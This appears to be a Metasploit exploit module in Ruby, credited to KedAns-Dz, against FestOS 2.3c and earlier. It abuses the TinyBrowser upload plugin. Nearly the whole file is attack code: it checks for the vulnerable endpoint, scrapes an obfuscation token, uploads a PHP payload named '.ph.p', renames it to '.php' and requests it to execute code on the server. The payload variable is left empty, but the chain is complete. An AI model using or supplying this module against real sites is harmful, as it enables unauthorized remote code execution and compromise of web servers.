### # Title : FestOS <= 2.3c TinyBrowser File Upload Code Execution (meta) # Author : KedAns-Dz # E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com # Twitter page : twitter.com/kedans # platform : php # Impact : File Upload Code Execution (via MetaSploit3) # Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] ## # $Id: festos_tinybrowser.rb | 2011-05-31 01:10 | KedAns-Dz $ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'FestOS <= 2.3c TinyBrowser File Upload Code Execution', 'Description' => %q{ This module exploits a vulnerability in the TinyMCE/tinybrowser plugin. By renaming the uploaded file this vulnerability can be used to upload/execute code on the affected system. }, 'Author' => [ 'KedAns-Dz ' ], 'License' => MSF_LICENSE, 'Version' => '1.0', 'References' => [ ['URL', 'http://1337day.com/exploits/16057'], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, 'Space' => 1024, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => '08/05/2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "FestOS directory path", "/"]), ], self.class) end def check uri = '' uri << datastore['URI'] uri << '/' if uri[-1,1] != '/' uri << 'admin/includes/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=' res = send_request_raw( { 'uri' => uri }, 25) if (res and res.body =~ /flexupload.swf/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def retrieve_obfuscation() end def exploit cmd_php = '' # Generate some random strings cmdscript = rand_text_alpha_lower(20) boundary = rand_text_alphanumeric(6) # Static files directory = '/images/demo/' uri_base = '' uri_base << datastore['URI'] uri_base << '/' if uri_base[-1,1] != '/' uri_base << 'admin/includes/tiny_mce/plugins/tinybrowser' # Get obfuscation code (needed to upload files) obfuscation_code = nil res = send_request_raw({ 'uri' => uri_base + '/upload.php?type=file&folder=' }, 25) if (res) if(res.body =~ /"obfus", "((\w)+)"\)/) obfuscation_code = $1 print_status("Successfully retrieved obfuscation code: #{obfuscation_code}") else print_error("Error retrieving obfuscation code!") return end end # Upload shellcode (file ending .ph.p) data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n" data << "#{cmdscript}.ph.p\r\n--#{boundary}" data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n" data << "Content-Type: application/octet-stream\r\n\r\n" data << cmd_php data << "\r\n--#{boundary}--" res = send_request_raw({ 'uri' => uri_base + "/upload_file.php?folder=" + directory + "&type=file&feid=&obfuscate=#{obfuscation_code}&sessidpass=", 'method' => 'POST', 'data' => data, 'headers' => { 'Content-Length' => data.length, 'Content-Type' => 'multipart/form-data; boundary=' + boundary, } }, 25) if (res and res.body =~ /File Upload Success/) print_status("Successfully uploaded #{cmdscript}.ph.p") else print_error("Error uploading #{cmdscript}.ph.p") end # Complete the upload process (rename file) print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p") res = send_request_raw({ 'uri' => uri_base + '/upload_process.php?folder=' + directory + '&type=file&feid=&filetotal=1' }) # Rename the file from .ph.p to .php res = send_request_cgi( { 'method' => 'POST', 'uri' => uri_base + '/edit.php?type=file&folder=', 'vars_post' => { 'actionfile[0]' => "#{cmdscript}.ph.p", 'renameext[0]' => 'p', 'renamefile[0]' => "#{cmdscript}.ph", 'sortby' => 'name', 'sorttype' => 'asc', 'showpage' => '0', 'action' => 'rename', 'commit' => '', } }, 10) if (res and res.body =~ /successfully renamed./) print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php") else print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php") end # Finally call the payload print_status("Calling payload: #{cmdscript}.php") uri = '' uri << datastore['URI'] uri << '/' if uri[-1,1] != '/' uri << directory + cmdscript + ".php" res = send_request_raw({ 'uri' => uri }, 25) end end